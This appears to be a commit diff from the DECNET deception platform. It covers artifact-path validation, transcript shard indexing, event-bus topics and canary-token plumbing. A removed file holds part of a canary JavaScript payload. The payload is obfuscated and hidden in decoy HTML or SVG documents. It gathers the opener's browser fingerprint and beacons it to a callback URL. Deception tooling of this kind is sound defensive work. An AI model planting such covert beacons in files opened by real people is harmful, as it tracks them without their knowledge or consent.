_STORED_AS_RE = re.compile(
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
)
# Module-level so tests can monkeypatch. Override via env in production
# (the systemd unit sets this) — the prod path matches the bind mount
# declared in decnet/services/{ssh,smtp}.py.
# The environment variable is read once, when this module is imported.
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
)
class ArtifactPathError(ValueError):
    """Signals a rejected ``(decky, stored_as, service)`` triple.

    Raised either because one of the components failed validation or
    because the resolved path ended up outside the artifacts root.

    Callers are expected to handle it at their own boundary: the router
    converts it into ``HTTPException(400)``, while the lifter treats the
    event as having no body available (no-tag).
    """
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Map ``(decky, stored_as, service)`` to a path under ``ARTIFACTS_ROOT``.

    The components are validated in a fixed order — ``service`` against the
    allow-list, then ``decky`` and ``stored_as`` against their regexes — and
    the first failure wins. The joined path is then fully resolved and must
    still sit at or below the resolved root.

    Whether the file exists is deliberately not checked; callers deal with
    a missing file themselves (404 for the router, no-tag for the lifter).

    Raises:
        ArtifactPathError: a component failed validation, or the resolved
            path is not located under the artifacts root.
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if _DECKY_RE.fullmatch(decky) is None:
        raise ArtifactPathError("invalid decky name")
    if _STORED_AS_RE.fullmatch(stored_as) is None:
        raise ArtifactPathError("invalid stored_as")

    base = ARTIFACTS_ROOT.resolve()
    resolved = base.joinpath(decky, service, stored_as).resolve()

    # Belt and braces: the regexes already rule out `..`, but a symlink or
    # odd filesystem state could still redirect the resolved path elsewhere.
    if not resolved.is_relative_to(base):
        raise ArtifactPathError("path escapes artifacts root")
    return resolved

View File

@@ -1,129 +0,0 @@
"""Shared asciinema shard helpers.
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
so non-router callers (the BEHAVE-SHELL session-ended handler in
``decnet/profiler/worker.py``, the collector's session aggregator)
can resolve shard paths without crossing the layer boundary into the
FastAPI router.
Functions here speak in :class:`ValueError` — callers that want HTTP
semantics translate at the boundary. The router wrappers keep their
existing ``HTTPException`` behaviour for backwards compatibility.
PII boundary unchanged: shards live on disk; this module returns
:class:`pathlib.Path` pointers, never byte content. The ``get_index``
cache stores only byte offsets and lengths, keyed by session id.
"""
from __future__ import annotations
import os
import re
from collections import OrderedDict
from pathlib import Path
# Root of the artifacts tree; the environment variable is read once, when
# this module is imported.
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
)
# Decky name: 1–63 chars of lowercase alnum / hyphen, not starting with a hyphen.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
# Only these two services are accepted by validate_names.
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
# Shard file names look like sessions-YYYY-MM-DD.jsonl.
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
# Bytes pattern that pulls a 36-character hex/hyphen "sid" value out of a
# raw shard line without parsing the line as JSON.
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
# (path, mtime_ns) → {sid: [(offset, length), ...]}
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
OrderedDict()
)
# Maximum number of cached shard indexes; get_index evicts from the
# least-recently-used end once this is exceeded.
_CACHE_MAX = 32
def validate_names(decky: str, service: str) -> None:
    """Reject ``decky`` / ``service`` values that do not match the expected shape.

    ``decky`` is checked first, then ``service``; the first mismatch raises.

    Raises:
        ValueError: either name fails its regex. The message includes the
            offending value's ``repr``.
    """
    if _DECKY_RE.fullmatch(decky) is None:
        raise ValueError(f"invalid decky name: {decky!r}")
    if _SERVICE_RE.fullmatch(service) is None:
        raise ValueError(f"invalid service: {service!r}")
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Return the resolved path of one transcript shard.

    The location is ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``.
    ``decky`` and ``service`` are validated first, then ``shard_name``; after
    resolution the path must still sit at or below the resolved root.

    Raises:
        ValueError: a name is invalid, or the resolved path leaves the
            artifacts root.
    """
    validate_names(decky, service)
    if _SHARD_BASENAME_RE.fullmatch(shard_name) is None:
        raise ValueError(f"invalid shard name: {shard_name!r}")

    base = ARTIFACTS_ROOT.resolve()
    candidate = base.joinpath(decky, service, "transcripts", shard_name).resolve()
    if not candidate.is_relative_to(base):
        raise ValueError(f"path escapes artifacts root: {candidate}")
    return candidate
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    """Scan a shard once and record where each session's lines live.

    The file is read in binary mode, line by line. Every line that contains
    a ``"sid"`` field matching ``_SID_LINE_RE`` contributes one
    ``(byte_offset, byte_length)`` pair to that sid's list; lines without a
    match are skipped but still advance the running offset.
    """
    spans: dict[str, list[tuple[int, int]]] = {}
    position = 0
    with path.open("rb") as handle:
        for raw in handle:
            size = len(raw)
            hit = _SID_LINE_RE.search(raw)
            if hit is not None:
                session_id = hit.group(1).decode("ascii")
                spans.setdefault(session_id, []).append((position, size))
            position += size
    return spans
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(index, file_size)`` for a shard, using the module cache.

    ``index`` maps each sid to its list of ``(offset, length)`` pairs. Cache
    entries are keyed by ``(str(path), st_mtime_ns)``, so a modified shard
    gets a fresh entry. A hit is marked as most recently used; after an
    insert, the oldest entries are dropped until at most ``_CACHE_MAX``
    remain. ``file_size`` comes from the ``stat`` taken at the start of the
    call.
    """
    info = path.stat()
    cache_key = (str(path), info.st_mtime_ns)

    cached = _INDEX_CACHE.get(cache_key)
    if cached is not None:
        _INDEX_CACHE.move_to_end(cache_key)
        return cached, info.st_size

    fresh = _build_index(path)
    _INDEX_CACHE[cache_key] = fresh
    _INDEX_CACHE.move_to_end(cache_key)
    # Evict from the front (least recently used) until within the cap.
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return fresh, info.st_size
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Locate the transcript shard that contains lines for ``sid``.

    Looks at every ``sessions-YYYY-MM-DD.jsonl`` file in the decky's
    ``transcripts`` directory, highest name first (i.e. latest date first),
    and returns the first shard whose index lists ``sid``. Per-shard indexes
    come from :func:`get_index`, so repeated lookups reuse cached results
    while a shard's mtime is unchanged.

    Returns:
        The shard path, or ``None`` when no shard lists the sid, when the
        transcripts directory is missing or unreadable, or when it resolves
        outside the artifacts root. Shards that cannot be read are skipped.

    Raises:
        ValueError: ``decky`` or ``service`` fails name validation.
            Filesystem errors are never raised.
    """
    validate_names(decky, service)

    base = ARTIFACTS_ROOT.resolve()
    shard_dir = base.joinpath(decky, service, "transcripts").resolve()
    if base not in shard_dir.parents:
        return None

    # PermissionError is a subclass of OSError, so one clause covers both.
    try:
        listing = list(shard_dir.iterdir()) if shard_dir.is_dir() else None
    except OSError:
        return None
    if listing is None:
        return None

    candidates = [p for p in listing if _SHARD_BASENAME_RE.fullmatch(p.name)]
    candidates.sort(reverse=True)

    for shard in candidates:
        try:
            sid_map, _ = get_index(shard)
        except OSError:
            continue
        if sid in sid_map:
            return shard
    return None

View File

@@ -13,7 +13,7 @@ from typing import Sequence
from decnet.asn.base import Provider
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
from decnet.asn.iptoasn.parse import parse_file
from decnet.asn.lookup import AsnLookup, Range
from decnet.asn.lookup import AsnLookup
from decnet.asn.paths import ensure_root
logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
"asn.iptoasn: cache load failed, rebuilding: %s", exc
)
ranges: list[Range] = []
ranges = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
up at all we no-op.
"""
try:
from decnet.telemetry import wrap_repository
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
except ImportError:
return bus
try:

View File

@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
contract the rest of this module already upholds.
"""
if bus is None:
return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
return lambda _topic, _payload, _event_type="": None
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
# Stream threads may keep draining after the bus owner closed it

View File

@@ -17,7 +17,6 @@ Token structure (NATS-style, dot-separated):
attacker.scored
attacker.session.started
attacker.session.ended
attacker.observation.{primitive}
identity.formed
identity.observation.linked
identity.merged
@@ -29,18 +28,12 @@ Token structure (NATS-style, dot-separated):
campaign.unmerged
credential.captured
credential.reuse.detected
attribution.profile.state_changed
attribution.profile.multi_actor_suspected
canary.{token_id}.triggered
canary.{token_id}.placed
canary.{token_id}.revoked
system.log
system.bus.health
system.{worker}.health
email.received
ttp.tagged
ttp.rule.fired.{technique_id}
ttp.rule.suppressed
Wildcards (per :func:`decnet.bus.base.matches`):
@@ -59,12 +52,8 @@ IDENTITY = "identity"
CAMPAIGN = "campaign"
SYSTEM = "system"
CREDENTIAL = "credential"
ATTRIBUTION = "attribution"
ORCHESTRATOR = "orchestrator"
CANARY = "canary"
SMTP = "smtp"
EMAIL = "email"
TTP = "ttp"
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -94,19 +83,6 @@ DECKY_MUTATE_REQUEST = "mutate_request"
# syslog sidechannel too) to interleave substrate-change markers into
# attacker traversals.
DECKY_MUTATION = "mutation"
# Per-service add/remove on a deployed decky (live; no full redeploy).
# Payload carries ``decky_name``, ``service_name``, optional
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
# that watch substrate shape (correlator, dashboard, profiler) reconcile
# off these without waiting for the next decnet-state.json snapshot.
DECKY_SERVICE_ADDED = "service_added"
DECKY_SERVICE_REMOVED = "service_removed"
# Per-service config change (the schema-driven Inspector form). Payload
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
# ``service_config`` (the new validated dict), and ``recreated`` — true
# when the operator hit Apply (container was force-recreated to pick up
# the new env), false when they only hit Save (DB-only).
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
# Attacker event types (second token under the ``attacker`` root). First
# sighting, session boundary transitions, and score-threshold crossings
@@ -118,14 +94,6 @@ ATTACKER_SCORED = "scored"
# Distinct from ``observed`` which is the correlator's first-sight signal —
# a fingerprint is additional evidence about an already-observed attacker.
ATTACKER_FINGERPRINTED = "fingerprinted"
# Published when the prober observes a NEW hash for an
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
# attacker rotated their VPS, rebuilt their SSH server, swapped their
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
# result; ``fingerprint_rotated`` fires only on diff and carries both
# old_hash + new_hash. Producer: prober (via the rotation library);
# consumers: dashboard, forensics, attribution clustering.
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
ATTACKER_SESSION_STARTED = "session.started"
ATTACKER_SESSION_ENDED = "session.ended"
# Published by the ``decnet enrich`` worker after an enrichment pass
@@ -133,19 +101,6 @@ ATTACKER_SESSION_ENDED = "session.ended"
# returned a verdict). Payload carries the aggregate verdict + per-
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
ATTACKER_INTEL_ENRICHED = "intel.enriched"
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
# attacker.observation.<primitive>
# e.g. ``attacker.observation.motor.input_modality``. Producer:
# ``decnet/profiler/behave_shell/`` (extractor library called from the
# profiler worker on ``attacker.session.ended``); consumers: dashboard
# SSE relay, attribution engine state machine, federation gossip
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
# the wire-format contract — the prefix is documentation + pattern
# match only; bus auth is socket file perms (DEBT-029 §2), not
# topic-level. The ``primitive`` segment MAY contain dots
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
# rule that ``attacker.session.ended`` uses.
ATTACKER_OBSERVATION_PREFIX = "observation"
# Identity-resolution event types (second/third tokens under ``identity``).
# Published by the (future) clusterer worker — see
@@ -213,42 +168,6 @@ CAMPAIGN_UNMERGED = "unmerged"
CREDENTIAL_CAPTURED = "captured"
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
# Attribution-engine event types (second/third tokens under
# ``attribution``). Published by the v0 attribution worker
# (``decnet.correlation.attribution_worker``) which subscribes to
# ``attacker.observation.>`` and runs the per-(identity, primitive)
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
#
# attribution.profile.state_changed — per-primitive state
# transition (e.g.
# stable → drifting).
# Payload: identity_uuid,
# primitive, old_state,
# new_state, current_value,
# confidence,
# observation_count, ts.
# attribution.profile.multi_actor_suspected — fires when ≥ 2
# primitives flag the same
# identity as multi_actor
# concurrently. Cross-
# primitive correlator;
# single-primitive
# multi_actor is too noisy
# on its own. Payload:
# identity_uuid, primitives,
# evidence_summary,
# confidence, ts.
#
# These are *derived* signals — distinct from
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
# ``attacker.observation.*`` (raw extractor envelopes,
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
# the attribution engine, the engine emits derived state, the clusterer
# reads observations + state to form / merge identities.
ATTRIBUTION_PROFILE_PREFIX = "profile"
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
# Canary-token event types (third token under ``canary``).
#
# canary.{token_id}.placed — orchestrator/API successfully planted a
@@ -312,43 +231,6 @@ WORKER_CONTROL_START = "start"
# of patterns. Payload is currently empty; consumers only need the signal.
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
# Email-receipt event — fired by smtp / smtp-relay services on full-message
# receipt (envelope + headers + body + attachments captured). Single-token
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
# bytes.
EMAIL_RECEIVED = "received"
# TTP-tagging event types (second/third tokens under ``ttp``).
#
# ttp.tagged — one or more new tags written. Published
# only when ``INSERT OR IGNORE`` wrote at
# least one new row; idempotent
# re-evaluations publish nothing
# (loop-prevention invariant — see
# TTP_TAGGING.md).
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
# consumers that subscribe to a single
# technique. Topic key is the parent
# technique; sub_technique is in the
# payload. Built via :func:`ttp_rule_fired`.
# ttp.rule.suppressed — rule fired but the tag was dropped
# (confidence below floor, rate-limited,
# or the rule's RuleState was disabled).
# Observability signal for the dashboard.
#
# Per-rule reload + state-change topics. Built via
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
TTP_TAGGED = "tagged"
TTP_RULE_FIRED = "rule.fired"
TTP_RULE_SUPPRESSED = "rule.suppressed"
TTP_RULE_RELOADED = "rule.reloaded"
TTP_RULE_STATE = "rule.state"
# ─── Builders ────────────────────────────────────────────────────────────────
@@ -419,42 +301,6 @@ def attacker(event_type: str) -> str:
return f"{ATTACKER}.{event_type}"
def attacker_observation(primitive: str) -> str:
    """Return the topic ``attacker.observation.<primitive>``.

    *primitive* is the fully-qualified BEHAVE-SHELL primitive path, for
    example ``motor.input_modality`` or
    ``motor.shell_mastery.tab_completion``. It is appended verbatim, so
    dotted primitives yield a multi-token leaf, the same way
    :func:`attacker` handles ``session.started``.

    Raises:
        ValueError: if *primitive* is empty, so a typo upstream cannot
            ship as ``attacker.observation.``.
    """
    if primitive:
        return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
    raise ValueError(
        "attacker_observation topic requires a non-empty primitive",
    )
def attribution(event_type: str) -> str:
    """Return the topic ``attribution.<event_type>``.

    Typical values for *event_type* are
    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` and
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`. Both contain a dot
    (``profile.state_changed``); the value is appended as-is, following
    the same trailing-dotted-leaf rule as ``attacker.session.started``.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{ATTRIBUTION}.{event_type}"
    raise ValueError("attribution topic requires a non-empty event_type")
def campaign(event_type: str) -> str:
"""Build ``campaign.<event_type>``.
@@ -535,86 +381,6 @@ def system_control(worker: str) -> str:
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
def smtp(event_type: str) -> str:
    """Return the topic ``smtp.<event_type>``.

    *event_type* is appended unchanged and may itself be dotted
    (e.g. ``probe.pending``).

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{SMTP}.{event_type}"
    raise ValueError("smtp topic requires a non-empty event_type")
def email_topic(event_type: str) -> str:
    """Return the topic ``email.<event_type>``.

    The function is called ``email_topic`` instead of ``email`` so it
    does not shadow the stdlib ``email`` package at import sites that
    need both. *event_type* is typically :data:`EMAIL_RECEIVED`.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{EMAIL}.{event_type}"
    raise ValueError("email topic requires a non-empty event_type")
def ttp(event_type: str) -> str:
    """Return the topic ``ttp.<event_type>``.

    Typical values for *event_type* are :data:`TTP_TAGGED`,
    :data:`TTP_RULE_FIRED` and :data:`TTP_RULE_SUPPRESSED`. Dotted leaves
    such as ``rule.fired`` are appended as-is (same rationale as
    :func:`system`). Use :func:`ttp_rule_fired` for the per-technique
    fan-out topic.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{TTP}.{event_type}"
    raise ValueError("ttp topic requires a non-empty event_type")
def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.

    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, or ``ttp.rule.fired.T1110`` for
    one technique.

    *technique_id* is passed through ``_reject_tokens`` and must be a
    single segment. Sub-techniques like ``T1110.001`` are rejected
    because they would split into two tokens; the topic key is the
    parent technique and ``sub_technique_id`` lives in the payload.

    Raises:
        Whatever ``_reject_tokens`` raises for an invalid segment.
    """
    _reject_tokens(technique_id)
    # Use the shared leaf constant (as ttp_rule_reloaded / ttp_rule_state
    # do) so the "rule.fired" segment is defined in exactly one place.
    return f"{TTP}.{TTP_RULE_FIRED}.{technique_id}"
def ttp_rule_reloaded(rule_id: str) -> str:
    """Return the topic ``ttp.rule.reloaded.<rule_id>``.

    This is the per-rule fan-out topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires when a rule's
    *definition* changes (a YAML edit on the filesystem backend, a
    ``ttp_rule`` row update on the database backend). One event is
    published per rule edit, never batched; the granularity is inherited
    from :meth:`RuleStore.subscribe_changes`.

    Subscribe to ``ttp.rule.reloaded.>`` for every rule, or to
    ``ttp.rule.reloaded.R0001`` for a single one.

    *rule_id* is checked by ``_reject_tokens`` and must be a single
    topic segment.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
    return topic
def ttp_rule_state(rule_id: str) -> str:
    """Return the topic ``ttp.rule.state.<rule_id>``.

    This is the per-rule fan-out topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires when a rule's
    *operational state* changes: an operator disables it, or an
    ``expires_at`` TTL fires and auto-reverts the state.

    *rule_id* is checked by ``_reject_tokens`` and must be a single
    topic segment.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
    return topic
def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization.

View File

@@ -1,18 +0,0 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// On any failure the error (stack if available) goes to stderr and the
// process exits with status 2.
// Kept dependency-light on purpose: only javascript-obfuscator.
const JsObf = require('javascript-obfuscator');

// stdin arrives in arbitrary chunks; collect them and parse once at EOF.
const chunks = [];
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { chunks.push(chunk); });
process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(chunks.join(''));
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String((e && e.stack) || e));
    // Set the exit code instead of calling process.exit(): exit() ends
    // the process immediately and can drop stderr output that is still
    // queued when the stream is asynchronous. With stdin at EOF nothing
    // else keeps the event loop alive, so the process still ends with
    // status 2 once the write has flushed.
    process.exitCode = 2;
  }
});

View File

@@ -100,12 +100,6 @@ class CanaryArtifact:
planting. Never leaked to the attacker-facing surface.
"""
fingerprint_nonce: Optional[str] = None
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
so the worker can validate incoming ``?k=`` params.
"""
class CanaryGenerator(ABC):
"""Produces a fake artifact from scratch."""

View File

@@ -46,8 +46,6 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
}
@@ -64,8 +62,6 @@ _GENERATOR_TO_KIND: dict[str, str] = {
"honeydoc_pdf": "http",
"ssh_key": "dns", # trip is DNS resolution of host comment
"mysql_dump": "dns", # trip is DNS resolution of subdomain
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
"fingerprint_svg": "http", # same, embedded inside SVG <script>
}
@@ -82,8 +78,6 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
}
@@ -142,12 +136,10 @@ async def cultivate(
)
callback_token = _new_callback_token()
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
ctx = CanaryContext(
callback_token=callback_token,
http_base=http_base_str,
dns_zone=dns_zone_str,
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
persona="linux", # all our deckies are POSIX in MVP
)
generator = get_generator(gen_name)
@@ -162,7 +154,7 @@ async def cultivate(
# attribute a callback if the artifact trips during the plant
# itself (improbable but possible — DOCX viewers can preview
# autoplay-style).
token_data: dict = {
await repo.create_canary_token({
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
"decky_name": plan.decky_name,
"instrumenter": None,
@@ -173,10 +165,7 @@ async def cultivate(
"placed_at": datetime.now(timezone.utc),
"created_by": created_by,
"state": "planted",
}
if artifact.fingerprint_nonce is not None:
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
await repo.create_canary_token(token_data)
})
# Carry the placement_path on the artifact so the orchestrator's
# plant_file call uses it. We don't mutate the generator's

View File

@@ -131,7 +131,7 @@ def _build_response(
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
answer = b""
if an_count and answer_ip is not None:
if an_count:
# Use a name pointer back to the question (offset 12).
ptr = struct.pack("!H", 0xC000 | 12)
rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
self._answer_ip = answer_ip
self._transport: Optional[asyncio.DatagramTransport] = None
def connection_made(self, transport) -> None:
self._transport = transport
def connection_made(self, transport) -> None: # type: ignore[override]
self._transport = transport # type: ignore[assignment]
def datagram_received(
def datagram_received( # type: ignore[override]
self, data: bytes, addr: Tuple[str, int],
) -> None:
try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
return
# Known name — answer with our sinkhole IP, then fire the hook.
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
asyncio.ensure_future(self._hook(slug, query, addr[0]))
asyncio.create_task(self._hook(slug, query, addr[0]))
def _slug_for(self, qname: str) -> Optional[str]:
if not self._zone or not qname.endswith(self._suffix):

View File

@@ -21,8 +21,6 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
"honeydoc_docx",
"honeydoc_pdf",
"mysql_dump",
"fingerprint_html",
"fingerprint_svg",
)
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -66,16 +64,6 @@ def get_generator(name: str) -> CanaryGenerator:
if name == "mysql_dump":
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
return MySQLDumpGenerator()
if name == "fingerprint_html":
from decnet.canary.generators.fingerprint_html import (
FingerprintHtmlGenerator,
)
return FingerprintHtmlGenerator()
if name == "fingerprint_svg":
from decnet.canary.generators.fingerprint_svg import (
FingerprintSvgGenerator,
)
return FingerprintSvgGenerator()
raise ValueError(
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
)

View File

@@ -1,291 +0,0 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
// Overview: collects browser properties into `fp`, one section at a time.
// Every section runs in its own try/catch and records `{ err: ... }` on
// failure, so one unavailable API never prevents the final beacon.
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
var fp = { mint: MINT_UUID };
// Issue a GET by pointing an Image at `url`; the response is never read
// and any exception is swallowed.
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
// Returns a Promise resolving to the lowercase hex SHA-256 of `str`
// (UTF-8 encoded). Uses crypto.subtle; callers invoke it inside their own
// try/catch, so a missing crypto.subtle lands in that section's `err`.
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
// fp.cn is null (not an error object) when navigator.connection is absent.
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
// Draws a fixed scene and records the SHA-256 and length of its data URL.
// NOTE(review): String.fromCharCode works on 16-bit code units, so
// 0x1f600 is truncated to 0xF600 here rather than producing U+1F600.
// String.fromCodePoint would draw the emoji but would also change every
// canvas hash — confirm with stored fingerprints before touching this.
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
// Unmasked vendor/renderer are only read when the debug extension exists.
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
